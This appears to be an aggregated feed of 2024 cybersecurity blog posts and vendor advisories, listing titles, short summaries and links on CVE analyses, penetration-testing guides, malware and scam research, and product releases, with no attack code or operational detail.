Learning, Sharing, and Exploring with NIST's New Human-Centered Cybersecurity Community of Interest
Human-centered cybersecurity (also known as ‘usable security') involves the social, organizational, and technological influences on people's understanding of and interactions with cybersecurity. By taking a human-centered cybersecurity (HCC) approach, we can both improve people's cybersecurity experiences and achieve better cybersecurity outcomes, which is so important in today's digitally interconnected world. At NIST, we understand the value of making connections, listening, and interactivity. We also understand that researchers and practitioners want to hear directly from each other—and
https://www.nist.gov/blogs/cybersecurity-insights/learning-sharing-and-exploring-nists-new-human-centered-cybersecurity

May 2024 Cyber Attacks Statistics
After the cyber attacks timelines (part I and part II), it's time to publish the statistics for May 2024 where I collected and analyzed 242 events...
https://www.hackmageddon.com/2024/08/29/may-2024-cyber-attacks-statistics/

CVE-2024-38063 - Remotely Exploiting The Kernel Via IPv6
Performing a root cause analysis and building a proof-of-concept for CVE-2024-38063, a CVSS 9.8 vulnerability in the Windows kernel IPv6 parser.
https://malwaretech.com/2024/08/exploiting-CVE-2024-38063.html

MSSQL for Pentester: NetExec
NetExec (nxc) is a powerful network exploitation tool developed as a modern successor to CrackMapExec (CME), which was widely used by penetration testers and red The post MSSQL for Pentester: NetExec appeared first on Hacking Articles.
https://www.hackingarticles.in/mssql-for-pentester-netexec/

Scanning for CVE-2017-9841 Drops Precipitously
Last issue, we observed huge amounts of scanning for the rather old CVE-2017-9841, an RCE in PHPUnit. This time it’s fallen off nearly as sharply. We look into why!
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-july-2024

A Patchdiffing Journey – TP-Link Omada
Last year we participated in the Pwn2Own 2023 Toronto competition and successfully exploited the Synology BC500 camera. The DEVCORE Internship Program team managed to exploit a bug in the TP-Link Omada Gigabit VPN Router. So I was naturally curious and wanted to figure out how difficult it would be to recreate that exploit having access only to a high-level bug description and the firmware.
https://blog.compass-security.com/2024/08/a-patchdiffing-journey-tp-link-omada/

Copilot Studio information disclosure via SSRF

https://www.cloudvulndb.org/copilot-studio-infoleak-ssrf

ClamAV 1.4.0 feature release and ClamAV bytecode compiler 1.4.0 release
The ClamAV 1.4.0 feature release is now stable. We encourage everyone to download the latest version now from the ClamAV downloads page, on the GitHub Release page, and through Docker Hub*: Alpine-based images and Debian-based multi-arch images. *The Docker images are built on release day and will be made available when they are ready. We are also publishing ClamAV bytecode compiler version 1.4.0. The ClamAV bytecode compiler release files are available for download on the GitHub Release page and through Docker Hub. ClamAV platform support changes: We will no longer provide Linux 32-bit packages. With RHEL 7 reaching end-of-life, we had to upgrade our build hosts and selected Alma Linux 8. Alma Linux does not provide 32-bit images. ClamAV users on 32-bit platforms can still build from source. We now provide...
http://blog.clamav.net/2024/08/clamav-140-feature-release-and-clamav.html

CryptoCore: Unmasking the Sophisticated Cryptocurrency Scam Operations
As digital currencies have grown, so have cryptocurrency scams, posing significant user risks. The rise of AI and deepfake technology has intensified scams exploiting famous personalities and events by creating realistic fake videos. Platforms like X and YouTube have been especially targeted, with scammers hijacking high-profile accounts to distribute fraudulent content. This report delves into the CryptoCore group's complex scam operations, analyzing their use of deepfakes, hijacked accounts, and fraudulent websites to deceive victims and profit millions of dollars. The post CryptoCore: Unmasking the Sophisticated Cryptocurrency Scam Operations appeared first on Avast Threat Labs.
https://decoded.avast.io/martinchlumecky1/cryptocore-unmasking-the-sophisticated-cryptocurrency-scam-operations/?utm_source=rss&utm_medium=rss&utm_campaign=cryptocore-unmasking-the-sophisticated-cryptocurrency-scam-operations

Azure Health privilege escalation via SSRF

https://www.cloudvulndb.org/azure-health-pe-ssrf

ClamAV 0.103 LTS End of Life Announcement
The ClamAV 0.103 LTS release is nearing end-of-life (EOL) with regards to security vulnerability fix support from our team. This end of life date will be Sept. 14, 2024. ClamAV 0.103 users will be able to update signatures from the official database mirror for an additional one year after the EOL date. After Sept. 14, 2025, we may block ClamAV 0.103 from downloading signature updates. We recommend that users update to the newest LTS release, ClamAV 1.0.6. For users that want to upgrade to the newest non-LTS release, use ClamAV 1.3.1. The most recent version of ClamAV can be found here: https://www.clamav.net/downloads The following is a list of major changes available to users in the newest versions of ClamAV. Since ClamAV 0.103, ClamAV 1.0 LTS adds: A...
http://blog.clamav.net/2024/08/clamav-0103-lts-end-of-life-announcement.html

60 Hurts per Second – How We Got Access to Enough Solar Power to Run the United States
The electricity grid – the buzzing, crackling marvel that supplies the lifeblood of modernity - is by far the largest structure humanity ever built. It's so big, in fact, that few people even notice it, like a fish can't see the ocean. Until the grid goes down, that is. Then, like the fish dangling from the angler's hook, we see our vulnerability. Modernity dissolves into a sudden silence, followed by the repeated flick of a light switch, and a howl of panic at the prospect of missed appointmen
https://www.bitdefender.com/en-us/blog/labs/60-hurts-per-second-how-we-got-access-to-enough-solar-power-to-run-the-united-states/

Penetration Testing on MYSQL (Port 3306)
MySQL is an open-source Relational Database Management System (RDBMS). It is widely used for managing and organizing data in a structured format, using tables to The post Penetration Testing on MYSQL (Port 3306) appeared first on Hacking Articles.
https://www.hackingarticles.in/penetration-testing-on-mysql-port-3306/

What Are Scrapers and Why Should You Care?
Data miners and scraper bots are everywhere, feeding AI LLMs and more, and many of them are NOT harmless.
https://www.f5.com/labs/articles/threat-intelligence/what-are-scrapers-and-why-should-you-care

Configure GitHub Artifact Attestations for secure cloud-native delivery
Introducing the generally available capability of GitHub Artifact Attestations to secure your cloud-native supply chain packages and images. The post Configure GitHub Artifact Attestations for secure cloud-native delivery appeared first on The GitHub Blog.
https://github.blog/security/supply-chain-security/configure-github-artifact-attestations-for-secure-cloud-native-delivery/

Huge Increase in Scanning for CVE-2017-9841 With Large Variability in Scanning Infrastructure
The rather old CVE-2017-9841, an RCE in PHPUnit, suddenly jumps to the top of our list, with an increase of nearly 400% since last month. We dig into the scanning infrastructure.
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-june-2024

Issue with AWS Client VPN - CVE-2024-30164, CVE-2024-30165
Publication Date: 2024/07/16 3:30 PM PDT AWS is aware of CVE-2024-30164 and CVE-2024-30165 in AWS Client VPN. These issues could potentially allow an actor with access to an end user's device to escalate to root privilege and execute arbitrary commands on that device. We addressed these issues on all platforms. Customers using AWS Client VPN should upgrade to version 3.11.1 or higher for Windows, 3.9.2 or higher for MacOS, and 3.12.1 or higher for Linux. For additional information on configuring AWS Client VPN to meet your security and compliance requirements, please refer to our "Security in AWS Client VPN" user guide. We would like to thank Robinhood for collaborating on this issue through the coordinated vulnerability disclosure process. Security-related questions...
https://aws.amazon.com/security/security-bulletins/AWS-2024-008/

Issue with PyTorch TorchServe - CVE-2024-35198, CVE-2024-35199
Publication Date: 2024/07/18 2:50 PM PDT AWS is aware of the issues described in CVE-2024-35198 and CVE-2024-35199 in PyTorch TorchServe versions 0.3.0 to 0.10.0. Customers using PyTorch inference Deep Learning Containers (DLC) through Amazon SageMaker are not affected. CVE-2024-35198 does not prevent a model from being downloaded into the model store if the URL contains characters such as ".." when TorchServe model registration API is called. Customers using PyTorch inference Deep Learning Containers (DLC) through Amazon SageMaker and Amazon Elastic Kubernetes Service (Amazon EKS) are not affected by this issue. CVE-2024-35199 does not bind two gRPC ports 7070 and 7071 to localhost by default. These two interfaces are bound to all interfaces when TorchServe is natively launched...
https://aws.amazon.com/security/security-bulletins/AWS-2024-009/

3 ways to get Remote Code Execution in Kafka UI
In this blog post, we'll explain how we discovered three critical vulnerabilities in Kafka UI and how they can be exploited. The post 3 ways to get Remote Code Execution in Kafka UI appeared first on The GitHub Blog.
https://github.blog/security/vulnerability-research/3-ways-to-get-remote-code-execution-in-kafka-ui/

File Transfer Cheatsheet: Windows and Linux
File transfer is a crucial step in the post-exploitation scenario while performing penetration testing or red teaming. There are various ways to do the file The post File Transfer Cheatsheet: Windows and Linux appeared first on Hacking Articles.
https://www.hackingarticles.in/file-transfer-cheatsheet-windows-and-linux/

2024 DDoS Attack Trends
Unveiling the rise of Hacktivism in a tense global climate.
https://www.f5.com/labs/articles/threat-intelligence/2024-ddos-attack-trends

WinRM Penetration Testing
Windows Remote Management (WinRM) is a protocol developed by Microsoft for remotely managing hardware and operating systems on Windows machines. It is a component of The post WinRM Penetration Testing appeared first on Hacking Articles.
https://www.hackingarticles.in/winrm-penetration-testing/

How insecure is Avast Secure Browser?
A while ago I already looked into Avast Secure Browser. Back then it didn't end well for Avast: I found critical vulnerabilities allowing arbitrary websites to infect user's computer. Worse yet: much of it was due to neglect of secure coding practices, existing security mechanisms were disabled for no good reason. I didn't finish that investigation because I discovered that the browser was essentially spyware, collecting your browsing history and selling it via Avast's Jumpshot subsidiary. But that was almost five years ago. After an initial phase of denial, Avast decided to apologize and to wind down Jumpshot. It was certainly a mere coincidence that Avast was subsequently sold to NortonLifeLock, called Gen Digital today. Yes, Avast is truly reformed and paying for their crimes in...
https://palant.info/2024/07/15/how-insecure-is-avast-secure-browser/

Unauthorized Access to AWS Account Findings in Microsoft Defender for Cloud
Microsoft Defender for Cloud at one point provided customers with a flawed configuration template through their public GitHub repository. This template creates resources in the customer's AWS account so that Microsoft Defender for Cloud can scan it. In the rare cases in which this template was deployed, under certain, limited circumstances, Defender for Cloud's security findings for these AWS accounts could be disclosed to unauthorized third parties.
https://www.cloudvulndb.org/mdc-aws-findings-disclosure

Deep Dive on Supplement Scams: How AI Drives ‘Miracle Cures' and Sponsored Health-Related Scams on Social Media
Sponsored social media content has become increasingly present on feeds. Sponsored ads can often be beneficial as they are customized to suit online personas, offering relevant content tailored specifically for you. While personalized ads can help enhance your online experience, not all are legitimate. In fact, scams originating from phony ads on social media have increased dramatically, with potentially severe consequences for consumers. Sponsored supplement scams on social media platforms
https://www.bitdefender.com/en-us/blog/labs/deep-dive-on-supplement-scams-how-ai-drives-miracle-cures-and-sponsored-health-related-scams-on-social-media/

OpenSSH regreSSHion Attack (CVE-2024-6387)
CVE-2024-6387: A signal handler race condition was found in OpenSSH's server (sshd). If a client does not authenticate within LoginGraceTime seconds (120 by default, 600 in old OpenSSH versions), sshd's SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example, syslog(). This could lead to remote code execution with root privileges. Revised on 2024-11-20 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-258

Decrypted: DoNex Ransomware and its Predecessors
Researchers from Avast have discovered a flaw in the cryptographic schema of the DoNex ransomware and its predecessors. In cooperation with law enforcement organizations, we have been silently providing the decryptor to DoNex ransomware victims since March 2024. The cryptographic weakness was made public at Recon 2024 and therefore we have no reason to keep […] The post Decrypted: DoNex Ransomware and its Predecessors appeared first on Avast Threat Labs.
https://decoded.avast.io/threatresearch/decrypted-donex-ransomware-and-its-predecessors/?utm_source=rss&utm_medium=rss&utm_campaign=decrypted-donex-ransomware-and-its-predecessors

MSSQL for Pentester: Command Execution with xp_cmdshell
Transact-SQL (T-SQL) is an extension of the SQL language used primarily in Microsoft SQL Server. T-SQL expands the functionality of SQL by adding procedural programming The post MSSQL for Pentester: Command Execution with xp_cmdshell appeared first on Hacking Articles.
https://www.hackingarticles.in/mssql-for-pentester-command-execution-with-xp_cmdshell/

SAML Raider Release 2.0.0
SAML Raider is a Burp Suite extension and the tool of choice for many pentesters for testing SAML infrastructures. This blog post gives a brief introduction to what has changed in the new version 2.0.0, from improvements to the developer and user experience to bug fixes.
https://blog.compass-security.com/2024/07/saml-raider-release-2-0-0/

The Windows Registry Adventure #3: Learning resources
Posted by Mateusz Jurczyk, Google Project Zero When tackling a new vulnerability research target, especially a closed-source one, I prioritize gathering as much information about it as possible. This gets especially interesting when it's a subsystem as old and fundamental as the Windows registry. In that case, tidbits of valuable data can lurk in forgotten documentation, out-of-print books, and dusty open-source code – each potentially offering a critical piece of the puzzle. Uncovering them takes some effort, but the payoff is often immense. Scraps of information can contain hints as to how certain parts of the software are implemented, as well as why – what were ...
https://googleprojectzero.blogspot.com/2024/06/the-windows-registry-adventure-3.html

Attack of the clones: Getting RCE in Chrome's renderer with duplicate object properties
In this post, I'll exploit CVE-2024-3833, an object corruption bug in v8, the JavaScript engine of Chrome, that allows remote code execution (RCE) in the renderer sandbox of Chrome by a single visit to a malicious site. The post Attack of the clones: Getting RCE in Chrome's renderer with duplicate object properties appeared first on The GitHub Blog.
https://github.blog/security/vulnerability-research/attack-of-the-clones-getting-rce-in-chromes-renderer-with-duplicate-object-properties/

Ashok - A OSINT Recon Tool, A.K.A Swiss Army Knife
Reconnaissance is the first phase of penetration testing, which means gathering information before any real attacks are planned. Ashok is an incredibly fast recon tool for penetration testers which is specially designed for the Reconnaissance phase. In Ashok-v1.1 you can find the advanced Google dorker and wayback crawling machine. Main Features: Wayback Crawler Machine; Google Dorking without limits; GitHub Information Grabbing; Subdomain Identifier; CMS/Technology Detector With Custom Headers. Installation: ~> git clone https://github.com/ankitdobhal/Ashok ~> cd Ashok ~> python3.7 -m pip3 install -r requirements.txt How to use Ashok? A detailed usage guide is available in the Usage section of the Wiki, but some index of options is given below:...
http://www.kitploit.com/2024/06/ashok-osint-recon-tool-aka-swiss-army.html

Scanning for TP-Link Wifi Router Vulnerability Increases by 100%
The TP-Link Archer AX21 Wifi Router vulnerability CVE-2023-1389 experiences massive targeting along with a rather old critical RCE in PHPUnit.
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-may-2024

Project Naptime: Evaluating Offensive Security Capabilities of Large Language Models
Posted by Sergei Glazunov and Mark Brand, Google Project Zero. Introduction: At Project Zero, we constantly seek to expand the scope and effectiveness of our vulnerability research. Though much of our work still relies on traditional methods like manual source code audits and reverse engineering, we're always looking for new approaches. As the code comprehension and general reasoning ability of Large Language Models (LLMs) has improved, we have been exploring how these models can reproduce the systematic approach of a human security researcher when identifying and demonstrating security vulnerabilities. We hope that in the future, this can close some of the blind spots of current automated vulnerability discovery approaches, and enable automated detection of "unfuzzable" vulnerabilities. ...
https://googleprojectzero.blogspot.com/2024/06/project-naptime.html

Execute commands by sending JSON? Learn how unsafe deserialization vulnerabilities work in Ruby projects
Can an attacker execute arbitrary commands on a remote server just by sending JSON? Yes, if the running code contains unsafe deserialization vulnerabilities. But how is that possible? In this blog post, we'll describe how unsafe deserialization vulnerabilities work and how you can detect them in Ruby projects. The post Execute commands by sending JSON? Learn how unsafe deserialization vulnerabilities work in Ruby projects appeared first on The GitHub Blog.
https://github.blog/security/vulnerability-research/execute-commands-by-sending-json-learn-how-unsafe-deserialization-vulnerabilities-work-in-ruby-projects/

New Diamorphine rootkit variant seen undetected in the wild
Introduction: Code reuse is very frequent in malware, especially for those parts of the sample that are complex to develop or hard to write with an essentially different alternative code. By tracking both source code and object code, we efficiently detect new malware and track the evolution of existing malware in-the-wild. Diamorphine is a well-known […] The post New Diamorphine rootkit variant seen undetected in the wild appeared first on Avast Threat Labs.
https://decoded.avast.io/davidalvarez/new-diamorphine-rootkit-variant-seen-undetected-in-the-wild/?utm_source=rss&utm_medium=rss&utm_campaign=new-diamorphine-rootkit-variant-seen-undetected-in-the-wild

Introducing Conkeyscan – Confluence Keyword Scanner
TL;DR Release of Conkeyscan – A Confluence Keyword/Secret Scanner, which is tailored towards pentesters. Secrets Everywhere Many companies, especially larger ones, need to store knowledge in a centralized way. A wiki is the usual choice for this. One product that is frequently used for this purpose is Confluence from Atlassian. Similar to how sensitive data […]
https://blog.compass-security.com/2024/06/introducing-conkeyscan-confluence-keyword-scanner/

Azure Machine Learning SSRF

https://www.cloudvulndb.org/azure-ml-ssrf-pt

GCP HMAC Keys do not log creation, deletion or usage
Cloud Audit Logs do not capture actions mediated through the cloud console private API service (cloudconsole-pa). Consequently, there is no logging of HMAC key creation or deletion linked to user accounts. This absence of logs hampers defenders' ability to alert or monitor the creation of HMAC keys for user accounts, posing a persistence risk, or their deletion, presenting a denial of service risk.
https://www.cloudvulndb.org/gcp-hmac-keys-insufficient-logging

GCP HMAC Keys are not discoverable or revokable other than for self
GCP administrators face challenges in managing HMAC keys within their organizations, lacking visibility into which user accounts have generated these keys and whether they are actively being used to access storage objects. Additionally, there's a lack of functionality to revoke keys associated with other users, restricting their ability to enforce security policies effectively. Similarly, GCP incident response teams rely on Cloud Logging to monitor Cloud Storage object access, but they lack specific indicators to determine if HMAC keys are being utilized in these access attempts.
https://www.cloudvulndb.org/gcp-hmac-keys-unauditable

Driving forward in Android drivers
Posted by Seth Jenkins, Google Project Zero. Introduction: Android's open-source ecosystem has led to an incredible diversity of manufacturers and vendors developing software that runs on a broad variety of hardware. This hardware requires supporting drivers, meaning that many different codebases carry the potential to compromise a significant segment of Android phones. There are recent public examples of third-party drivers containing serious vulnerabilities that are exploited on Android. While there exists a well-established body of public (and In-the-Wild) security research on Android GPU drivers, other chipset components may not be as frequently audited, so this research sought to explore those drivers in greater detail. Driver Enumeration: Not as Easy as it Looks. This...
https://googleprojectzero.blogspot.com/2024/06/driving-forward-in-android-drivers.html

10 years of the GitHub Security Bug Bounty Program
Let's take a look at 10 key moments from the first decade of the GitHub Security Bug Bounty program. The post 10 years of the GitHub Security Bug Bounty Program appeared first on The GitHub Blog.
https://github.blog/security/vulnerability-research/10-years-of-the-github-security-bug-bounty-program/

Blockchain / Smart Contract Bugs
To identify and understand threats and weaknesses of smart contracts, it is important to be at least familiar with common smart contract bugs and vulnerabilities, how they can be leveraged by a malicious attacker, and how these issues can be mitigated. This blog article aims to raise awareness about common smart contract vulnerabilities and their corresponding mitigation strategies.
https://blog.compass-security.com/2024/06/blockchain-smart-contract-bugs/

Unfading Sea Haze: New Espionage Campaign in the South China Sea
Bitdefender researchers investigated a series of incidents at high-level organizations in countries of the South China Sea region, all performed by the same  threat actor we track as Unfading Sea Haze. Based on the victimology and the cyber-attack's aim, we believe the threat actor is aligned with China's interests. As tensions in the region rise, they are reflected in the intensification of activity on behalf of the Unfading Sea Haze actor, which uses new and improved tools and TTPs. We notice
https://www.bitdefender.com/en-us/blog/labs/unfading-sea-haze-new-espionage-campaign-in-the-south-china-sea/

Building DDoS Botnets with TP-Link and Netgear Routers
Threat actors double down with their botnet building efforts. Vulnerable Netgear routers join exploitable TP-Link and other IoT devices, expanding attacker DDoS capabilities.
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-april-2024

How to become a Hacker
Introduction Last year, I attended a job fair organized by the Association of Computer Science Students at ETH Zürich. It was a rewarding experience to be able to share my day-to-day work in a field I am so passionate about. We got to talk to numerous students at different stages of their studies, as well […]
https://blog.compass-security.com/2024/05/how-to-become-a-hacker/

Internal Azure Container Registry writable via exposed secret
A Microsoft employee accidentally published credentials via a git commit to a public repository. These credentials granted privileged access to an internal Azure Container Registry (ACR) used by Azure, which reportedly held container images utilized by multiple Azure projects, including Azure IoT Edge, Akri, and Apollo. The privileged access could have allowed an attacker to download private images as well as upload new images and (most importantly) overwrite existing ones. In theory, an attacker could have leveraged the latter to implement a supply chain attack against these Azure projects and their users. However, it is currently unknown precisely which images this ACR contained or how they were used, so the effective impact of this issue remains undetermined.
https://www.cloudvulndb.org/azure-internal-acr-secret

Notes on ThroughTek Kalay Vulnerabilities and Their Impact on the IoT Ecosystem
Since 2014, Bitdefender IoT researchers have been looking into the world's most popular IoT devices, hunting for vulnerabilities and undocumented attack avenues. This report documents four vulnerabilities affecting devices powered by the ThroughTek Kalay Platform. Due to the platform's massive presence in IoT integrations, these flaws have a significant downstream impact on several vendors. In the interconnected landscape of the Internet of Things (IoT), the reliability and security of devices,
https://www.bitdefender.com/en-us/blog/labs/notes-on-throughtek-kalay-vulnerabilities-and-their-impact/

Avast Q1/2024 Threat Report
Nearly 90% of Threats Blocked are Social Engineering, Revealing a Huge Surge of Scams, and Discovery of the Lazarus APT Campaign The post Avast Q1/2024 Threat Report appeared first on Avast Threat Labs.
https://decoded.avast.io/threatresearch/avast-q1-2024-threat-report/?utm_source=rss&utm_medium=rss&utm_campaign=avast-q1-2024-threat-report

ClamAV 1.4.0 release candidate now available!
The ClamAV 1.4.0 release candidate is now available. You may find the source code and installers for this release on the clamav.net/downloads page or the ClamAV GitHub release page. Tip: If you are downloading the source from the GitHub release page, the package labeled "clamav-1.4.0-rc.tar.gz" does not require an internet connection to build. All dependencies are included in this package. But if you download the ZIP or TAR.GZ generated by GitHub, located at the very bottom, then an internet connection will be required during the build to download additional Rust dependencies. For Docker users, there is no specific Docker tag for the release candidate, but you can use the clamav:unstable or clamav:unstable_base tags. The release candidate phase is expected...
http://blog.clamav.net/2024/05/clamav-140-release-candidate-now.html

Where does your software (really) come from?
GitHub is working with the OSS community to bring new supply chain security capabilities to the platform. The post Where does your software (really) come from? appeared first on The GitHub Blog.
https://github.blog/security/supply-chain-security/where-does-your-software-really-come-from/

Sensor Intel Series: Top CVEs in March 2024
TP-Link Archer AX21 Wifi Router targeting, plus a handful of new CVEs! See what mass scanning looks like in March 2024.
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-march-2024

CodeQL zero to hero part 3: Security research with CodeQL
Learn how to use CodeQL for security research and improve your security research workflow. The post CodeQL zero to hero part 3: Security research with CodeQL appeared first on The GitHub Blog.
https://github.blog/security/vulnerability-research/codeql-zero-to-hero-part-3-security-research-with-codeql/

GuptiMiner: Hijacking Antivirus Updates for Distributing Backdoors and Casual Mining
Avast discovered and analyzed GuptiMiner, a malware campaign hijacking an eScan antivirus update mechanism to distribute backdoors and coinminers. The post GuptiMiner: Hijacking Antivirus Updates for Distributing Backdoors and Casual Mining appeared first on Avast Threat Labs.
https://decoded.avast.io/janrubin/guptiminer-hijacking-antivirus-updates-for-distributing-backdoors-and-casual-mining/?utm_source=rss&utm_medium=rss&utm_campaign=guptiminer-hijacking-antivirus-updates-for-distributing-backdoors-and-casual-mining

The Windows Registry Adventure #2: A brief history of the feature
Posted by Mateusz Jurczyk, Google Project Zero Before diving into the low-level security aspects of the registry, it is important to understand its role in the operating system and a bit of history behind it. In essence, the registry is a hierarchical database made of named "keys" and "values", used by Windows and applications to store a variety of settings and configuration data. It is represented by a tree structure, in which keys may have one or more sub-keys, and every subkey is associated with exactly one parent key. Furthermore, every key may also contain one or more values, which have a type (integer, string, binary blob etc.) and are used to store actual data in the registry. Every key can be uniquely identified by its name and the names of all of its ascendants...
https://googleprojectzero.blogspot.com/2024/04/the-windows-registry-adventure-2.html

The Windows Registry Adventure #1: Introduction and research results
Posted by Mateusz Jurczyk, Google Project Zero In the 20-month period between May 2022 and December 2023, I thoroughly audited the Windows Registry in search of local privilege escalation bugs. It all started unexpectedly: I was in the process of developing a coverage-based Windows kernel fuzzer based on the Bochs x86 emulator (one of my favorite tools for security research: see Bochspwn, Bochspwn Reloaded, and my earlier font fuzzing infrastructure), and needed some binary formats to test it on. My first pick were PE files: they are very popular in the Windows environment, which makes it easy to create an initial corpus of input samples, and a basic fuzzing harness is equally easy to develop with just a single GetFileVersionInfoSizeW API call. The test was successful: even though...
https://googleprojectzero.blogspot.com/2024/04/the-windows-registry-adventure-1.html

From BYOVD to a 0-day: Unveiling Advanced Exploits in Cyber Recruiting Scams
Key Points. Introduction: In the summer of 2023, Avast identified a campaign targeting specific individuals in the Asian region through fabricated job offers. The motivation behind the attack remains uncertain, but judging from the low frequency of attacks, it appears that the attacker had a special interest in individuals with technical backgrounds. This sophistication is […] The post From BYOVD to a 0-day: Unveiling Advanced Exploits in Cyber Recruiting Scams appeared first on Avast Threat Labs.
https://decoded.avast.io/luiginocamastra/from-byovd-to-a-0-day-unveiling-advanced-exploits-in-cyber-recruiting-scams/?utm_source=rss&utm_medium=rss&utm_campaign=from-byovd-to-a-0-day-unveiling-advanced-exploits-in-cyber-recruiting-scams

ClamAV 1.3.1, 1.2.3, 1.0.6 patch versions published
Today, we are publishing the 1.3.1, 1.2.3, and 1.0.6 security patch versions. The release files for the patch versions are available for download on the ClamAV downloads page, on the GitHub Release page, and through Docker Hub. The images on Docker Hub may not be immediately available on release day. Continue reading to learn what changed in each version. 1.3.1: ClamAV 1.3.1 is a critical patch release with the following fixes: CVE-2024-20380: Fixed a possible crash in the HTML file parser that could cause a denial-of-service (DoS) condition. This issue affects version 1.3.0 only and does not affect prior versions. Thank you to Błażej Pawłowski for identifying this issue. GitHub pull request. Updated select Rust dependencies to the latest versions. This resolved Cargo audit complaints and included...
http://blog.clamav.net/2024/04/clamav-131-123-106-patch-versions.html

CVE-2024-28056
Publication Date: 2024/04/15 07:00 AM PST AWS is aware of CVE-2024-28056, which affects Amplify CLI versions prior to 12.10.1 and Amplify Studio, which uses Amplify CLI. We released a fix to Amplify CLI on January 10, 2024 that also fixed Amplify Studio, and recommend customers upgrade to Amplify CLI 12.10.1 or higher to address this issue. We have proactively communicated with the customers using affected versions. AWS has taken two additional steps to protect customers using Amplify from unintentional misconfigurations. First, AWS added a mitigation to the AWS Security Token Service (STS) where attempts to make a cross-account role assumption with a trust policy referencing Amazon Cognito as the trusted principal, without conditions to scope down access to specific Amazon Cognito...
https://aws.amazon.com/security/security-bulletins/AWS-2024-003/

Vulnerabilities Identified in LG WebOS
As the creator of the world's first smart home cybersecurity hub, Bitdefender regularly audits popular IoT hardware for vulnerabilities. This research paper is part of a broader program that aims to shed light on the security of the world's best-sellers in the IoT space. This report covers vulnerabilities discovered while researching the LG WebOS TV operating system. We have found several issues affecting WebOS versions 4 through 7 running on LG TVs. These vulnerabilities let us gain root acces
https://www.bitdefender.com/en-us/blog/labs/vulnerabilities-identified-in-lg-webos/

AI meets next-gen info stealers in social media malvertising campaigns
The impact that AI has on society has steadily crept into the darkest nooks and crannies of the internet. So much so that cybercrooks are hitching free rides on the AI bandwagon by leveraging the increased demand of AI-powered software for content creators. Cybercriminal groups constantly adapt their operating methods and tools to stay a step ahead of potential victims. Highly focused on enhancing their deceptive practices, threat actors have, unfortunately, found a most reliable and powerful a
https://www.bitdefender.com/en-us/blog/labs/ai-meets-next-gen-info-stealers-in-social-media-malvertising-campaigns/

CVE-2024-3094
Publication Date: 2024/03/29 12:30 PM PST CVE Identifier: CVE-2024-3094 AWS is aware of CVE-2024-3094, which affects versions 5.6.0 and 5.6.1 of the xz-utils package. This issue may attempt to introduce security issues in openssh through the use of liblzma within some operating system environments. Amazon Linux customers are not affected by this issue, and no action is required. AWS infrastructure and services do not utilize the affected software and are not impacted. Users of Bottlerocket are not affected. Customers using other operating systems are advised to refer to information provided by the OS vendor to address any concerns originating from this reported issue. Security-related questions or concerns can be brought to our attention via aws-security@amazon.com.
https://aws.amazon.com/security/security-bulletins/AWS-2024-002/

Sensor Intel Series: Top CVEs in February 2024
27 new CVEs, and continued IoT targeting. See what's new from February 2024.
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-february-2024

Numerous vulnerabilities in Xunlei Accelerator application
Xunlei Accelerator (迅雷客户端) a.k.a. Xunlei Thunder by the China-based Xunlei Ltd. is a wildly popular application. According to the company's annual report 51.1 million active users were counted in December 2022. The company's Google Chrome extension 迅雷下载支持, while not mandatory for using the application, had 28 million users at the time of writing. I've found this application to expose a massive attack surface. This attack surface is largely accessible to arbitrary websites that an application user happens to be visiting. Some of it can also be accessed from other computers in the same network or by attackers with the ability to intercept user's network connections (Man-in-the-Middle attack). It does not appear like security concerns were considered in the design...
https://palant.info/2024/03/06/numerous-vulnerabilities-in-xunlei-accelerator-application/

Sponsored Ad Fraud: Mystery Box Scams Flood Social Media
Social media platforms are overflowing with scams. In the past couple of months, Bitdefender Labs has been monitoring a steep increase in fraudulent social media ads on Facebook promoting various swindles ranging from crypto-doubling to AI-generated celebrity-endorsed giveaways. Our latest analysis has spotted a consistent trend, with fraudsters continuing to exploit Meta's ad system to deceive consumers. The hustle? A long-established ruse that involves peddling so-called mystery boxes from
https://www.bitdefender.com/en-us/blog/labs/sponsored-ad-fraud-mystery-box-scams-flood-social-media/

Lazarus and the FudModule Rootkit: Beyond BYOVD with an Admin-to-Kernel Zero-Day
The Lazarus Group is back with an upgraded variant of their FudModule rootkit, this time enabled by a zero-day admin-to-kernel vulnerability for CVE-2024-21338. Read this blog for a detailed analysis of this rootkit variant and learn more about several new techniques, including a handle table entry manipulation technique that directly targets Microsoft Defender, CrowdStrike Falcon, and HitmanPro. The post Lazarus and the FudModule Rootkit: Beyond BYOVD with an Admin-to-Kernel Zero-Day appeared first on Avast Threat Labs.
https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/?utm_source=rss&utm_medium=rss&utm_campaign=lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day

When Stealers Converge: New Variant of Atomic Stealer in the Wild
Here at Bitdefender, we're constantly working on improving detection capabilities for our macOS cyber-security products; part of this effort involves revisiting old (or digging up new) samples from our malware zoo. During routine verifications, we were able to isolate multiple suspicious and undetected macOS disk image files surprisingly small for files of this kind (1.3 MB per file). A short look into the code revealed that these files are significantly similar to other samples analysed in the
https://www.bitdefender.com/en-us/blog/labs/when-stealers-converge-new-variant-of-atomic-stealer-in-the-wild/

Details on Apple's Shortcuts Vulnerability: A Deep Dive into CVE-2024-23204
CVE-2024-23204 sheds light on the critical importance of continuous security vigilance. Apple's Shortcuts application, designed to enhance user automation, can inadvertently become a potential vector for privacy breaches. This analysis aims to provide users, developers, and security professionals with insights into the nature of the vulnerability, its potential impact, and recommended mitigation measures. At a glance: * We have discovered a vulnerability in Apple Shortcuts that lets a potent
https://www.bitdefender.com/en-us/blog/labs/details-on-apples-shortcuts-vulnerability-a-deep-dive-into-cve-2024-23204/

Decrypted: HomuWitch Ransomware
HomuWitch is a ransomware strain that initially emerged in July 2023. Unlike the majority of current ransomware strains, HomuWitch targets end-users - individuals - rather than institutions and companies. The post Decrypted: HomuWitch Ransomware appeared first on Avast Threat Labs.
https://decoded.avast.io/threatresearch/decrypted-homuwitch-ransomware/?utm_source=rss&utm_medium=rss&utm_campaign=decrypted-homuwitch-ransomware

